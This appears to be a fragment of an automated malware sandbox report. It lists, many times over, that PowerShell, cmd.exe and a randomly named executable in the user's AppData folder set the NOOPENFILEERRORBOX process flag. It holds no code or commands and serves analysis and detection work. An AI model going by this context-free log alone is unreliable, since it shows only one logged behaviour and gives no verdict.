                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess information set: NOOPENFILEERRORBOX
